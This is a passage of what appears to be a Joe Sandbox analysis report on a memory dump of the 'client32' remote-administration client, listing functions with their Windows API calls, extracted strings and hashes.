                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3768737497-0
                                                                                                                                                                • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                                                                                                • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                                                                                                • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                                                                                                • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                                                                                                Function 110106C0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LockitLockit::_std::_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3382485803-0
                                                                                                                                                                • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                                                                                                • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                                                                                                • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                                                                                                • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                                                                                                Function 11143000 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,76968400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: QueryValue
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3660427363-0
                                                                                                                                                                • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                                                                                                • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                                                                                                • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                                                                                                • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                                                                                                Function 110FACC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InformationToken
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4114910276-0
                                                                                                                                                                • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                                                                                                • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                                                                                                • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                                                                                                • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                                                                                                Function 11170166 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                                                                                                  • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 328603210-0
                                                                                                                                                                • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                                                                                                • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                                                                                                • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                                                                                                • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                                                                                                Function 111672E3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __waccess_s
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4272103461-0
                                                                                                                                                                • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                                • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                                                                                                • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                                • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                                                                                                Function 11163FED Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __fsopen
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646066109-0
                                                                                                                                                                • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                                • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                                                                                                • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                                • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 110076F0 Relevance: 86.3, APIs: 35, Strings: 14, Instructions: 548windowCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11088910: IsWindow.USER32(111305BC), ref: 1108892C
                                                                                                                                                                  • Part of subcall function 11088910: IsWindow.USER32(?), ref: 11088946
                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 1100773A
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 11007741
                                                                                                                                                                • GetDC.USER32(?), ref: 1100776D
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 1100777A
                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007884
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 11007892
                                                                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 110078A6
                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 110078B3
                                                                                                                                                                • CreateCompatibleBitmap.GDI32(?,?,?), ref: 110078C5
                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 110078F1
                                                                                                                                                                  • Part of subcall function 11002250: DeleteObject.GDI32(?), ref: 11002261
                                                                                                                                                                  • Part of subcall function 11002250: CreatePen.GDI32(?,?,?), ref: 11002288
                                                                                                                                                                  • Part of subcall function 11005AC0: CreateSolidBrush.GDI32(?), ref: 11005AE7
                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1100791B
                                                                                                                                                                • SelectClipRgn.GDI32(?,00000000), ref: 11007930
                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 1100793D
                                                                                                                                                                • DeleteDC.GDI32(?), ref: 1100794A
                                                                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007967
                                                                                                                                                                • ReleaseDC.USER32(?,?), ref: 11007996
                                                                                                                                                                • CreatePen.GDI32(00000002,00000001,00000000), ref: 110079A1
                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 11007A92
                                                                                                                                                                • GetSysColor.USER32(00000004), ref: 11007AA0
                                                                                                                                                                • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007AB7
                                                                                                                                                                  • Part of subcall function 11142370: GetObjectA.GDI32(11003CF6,00000018,?), ref: 11142383
                                                                                                                                                                  • Part of subcall function 11142370: CreateCompatibleDC.GDI32(00000000), ref: 11142391
                                                                                                                                                                  • Part of subcall function 11142370: CreateCompatibleDC.GDI32(00000000), ref: 11142396
                                                                                                                                                                  • Part of subcall function 11142370: SelectObject.GDI32(00000000,00000000), ref: 111423AE
                                                                                                                                                                  • Part of subcall function 11142370: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 111423C1
                                                                                                                                                                  • Part of subcall function 11142370: SelectObject.GDI32(00000000,00000000), ref: 111423CC
                                                                                                                                                                  • Part of subcall function 11142370: SetBkColor.GDI32(00000000,?), ref: 111423D6
                                                                                                                                                                  • Part of subcall function 11142370: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 111423F3
                                                                                                                                                                  • Part of subcall function 11142370: SetBkColor.GDI32(00000000,00000000), ref: 111423FC
                                                                                                                                                                  • Part of subcall function 11142370: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142408
                                                                                                                                                                  • Part of subcall function 11142370: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142425
                                                                                                                                                                  • Part of subcall function 11142370: SetBkColor.GDI32(00000000,?), ref: 11142430
                                                                                                                                                                  • Part of subcall function 11142370: SetTextColor.GDI32(00000000,00000000), ref: 11142439
                                                                                                                                                                  • Part of subcall function 11142370: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11142456
                                                                                                                                                                  • Part of subcall function 11142370: SelectObject.GDI32(00000000,00000000), ref: 11142461
                                                                                                                                                                  • Part of subcall function 1110F4A0: _malloc.LIBCMT ref: 1110F4A9
                                                                                                                                                                  • Part of subcall function 1110F4A0: _memset.LIBCMT ref: 1110F4D2
                                                                                                                                                                • _memset.LIBCMT ref: 11007B17
                                                                                                                                                                • _swscanf.LIBCMT ref: 11007B84
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 11007BB5
                                                                                                                                                                • _memset.LIBCMT ref: 11007BDC
                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 11007BEF
                                                                                                                                                                • GetObjectA.GDI32(00000000), ref: 11007BF6
                                                                                                                                                                • CreateFontIndirectA.GDI32(?), ref: 11007C03
                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 11007D46
                                                                                                                                                                • SetWindowTextA.USER32(?,00000000), ref: 11007D83
                                                                                                                                                                • GetSystemMetrics.USER32(00000001), ref: 11007DA3
                                                                                                                                                                • GetSystemMetrics.USER32(00000000), ref: 11007DC0
                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007E10
                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 110078D6
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(0000004C), ref: 110955CE
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(0000004D), ref: 110955D7
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(0000004E), ref: 110955DE
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(00000000), ref: 110955E7
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(0000004F), ref: 110955ED
                                                                                                                                                                  • Part of subcall function 110955C0: GetSystemMetrics.USER32(00000001), ref: 110955F5
                                                                                                                                                                • UpdateWindow.USER32(?), ref: 11007E42
                                                                                                                                                                • SetCursor.USER32(?), ref: 11007E4F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                                                                                                • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                • API String ID: 2635354838-2303488826
                                                                                                                                                                • Opcode ID: d239cf37228d0bcf3c2e9fcb1ed9174d39baad8ddbae7f420c202b4e7d79ce9b
                                                                                                                                                                • Instruction ID: 36caa8e1779c0778bab16f35b410b6a705d8f3f77552c035345af44ea38dcd93
                                                                                                                                                                • Opcode Fuzzy Hash: d239cf37228d0bcf3c2e9fcb1ed9174d39baad8ddbae7f420c202b4e7d79ce9b
